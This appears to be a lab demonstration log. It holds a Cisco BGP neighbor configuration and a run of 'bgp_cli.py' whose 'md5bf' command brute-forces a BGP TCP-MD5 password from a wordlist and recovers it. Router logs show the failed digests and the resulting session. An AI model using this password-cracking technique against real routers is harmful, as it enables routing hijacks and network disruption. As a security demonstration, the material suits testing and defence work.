router bgp 1
 bgp log-neighbor-changes
 neighbor 192.168.178.77 remote-as 3
 neighbor 192.168.178.77 password 7 120D0004065F5952





sleipnir src # PYTHONPATH=./tcpmd5/ python bgp_cli.py 
BGP_CLI v0.1.3 by Daniel Mende - dmende@ernw.de
BGP_CLI> session 3 8 
Session created
BGP_CLI> md5bf 192.168.178.3 wordfile 1
next pw: hallo

next pw: test

Found pw 'test456' for host 192.168.178.3
BGP_CLI> exit
Bye...





*Nov 14 20:26:21.998: %TCP-6-BADAUTH: Invalid MD5 digest from 192.168.178.77(37794) to 192.168.178.3(179)
*Nov 14 20:26:22.998: %TCP-6-BADAUTH: Invalid MD5 digest from 192.168.178.77(37795) to 192.168.178.3(179)
*Nov 14 20:26:24.010: BGP: 192.168.178.77 passive open to 192.168.178.3
*Nov 14 20:26:24.010: BGP: 192.168.178.77 went from Active to Idle
*Nov 14 20:26:24.010: BGP: 192.168.178.77 went from Idle to Connect
*Nov 14 20:26:24.010: BGP: 192.168.178.77 rcv message type 1, length (excl. header) 10
*Nov 14 20:26:24.114: BGP: 192.168.178.77 remote close, state CLOSEWAIT
*Nov 14 20:26:24.114: BGP: 192.168.178.77 -reset the session
